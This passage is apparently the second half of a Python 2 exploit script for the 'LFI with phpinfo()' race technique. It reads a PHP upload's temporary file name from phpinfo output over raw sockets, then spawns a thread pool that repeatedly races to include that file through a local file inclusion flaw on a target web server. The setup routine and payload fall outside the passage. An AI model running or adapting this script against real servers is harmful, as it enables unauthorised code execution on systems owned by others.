94 | self.event.set() 95 | 96 | except socket.error: 97 | return 98 | 99 | def getOffset(host, port, phpinforeq): 100 | """Gets offset of tmp_name in the php output""" 101 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 102 | s.connect((host,port)) 103 | s.send(phpinforeq) 104 | 105 | d = "" 106 | while True: 107 | i = s.recv(4096) 108 | d+=i 109 | if i == "": 110 | break 111 | # detect the final chunk 112 | if i.endswith("0\r\n\r\n"): 113 | break 114 | s.close() 115 | i = d.find("[tmp_name] =>") 116 | if i == -1: 117 | raise ValueError("No php tmp_name in phpinfo output") 118 | 119 | print "found %s at %i" % (d[i:i+10],i) 120 | # padded up a bit 121 | return i+256 122 | 123 | def main(): 124 | print "LFI With PHPInfo()" 125 | print "-=" * 30 126 | if len(sys.argv) < 2: 127 | print "Usage: %s host [port] [threads]" % sys.argv[0] 128 | sys.exit(1) 129 | try: 130 | host = socket.gethostbyname(sys.argv[1]) 131 | except socket.error, e: 132 | print "Error with hostname %s: %s" % (sys.argv[1], e) 133 | sys.exit(1) 134 | port=80 135 | try: 136 | port = int(sys.argv[2]) 137 | except IndexError: 138 | pass 139 | except ValueError, e: 140 | print "Error with port %d: %s" % (sys.argv[2], e) 141 | sys.exit(1) 142 | 143 | poolsz=10 144 | try: 145 | poolsz = int(sys.argv[3]) 146 | except IndexError: 147 | pass 148 | except ValueError, e: 149 | print "Error with poolsz %d: %s" % (sys.argv[3], e) 150 | sys.exit(1) 151 | print "Getting initial offset...", 152 | reqphp, tag, reqlfi = setup(host, port) 153 | #print(reqphp) 154 | offset = getOffset(host, port, reqphp) 155 | sys.stdout.flush() 156 | maxattempts = 1000 157 | e = threading.Event() 158 | l = threading.Lock() 159 | print "Spawning worker pool (%d)..." 
% poolsz 160 | sys.stdout.flush() 161 | tp = [] 162 | for i in range(0,poolsz): 163 | tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag)) 164 | for t in tp: 165 | t.start() 166 | try: 167 | while not e.wait(1): 168 | if e.is_set(): 169 | break 170 | with l: 171 | sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts)) 172 | sys.stdout.flush() 173 | if counter >= maxattempts: 174 | break 175 | print 176 | if e.is_set(): 177 | print "Woot! \m/" 178 | else: 179 | print ":(" 180 | except KeyboardInterrupt: 181 | print "\nTelling threads to shutdown..." 182 | e.set() 183 | 184 | print "Shuttin' down..." 185 | for t in tp: 186 | t.join() 187 | 188 | if __name__=="__main__": 189 | main() 190 | --------------------------------------------------------------------------------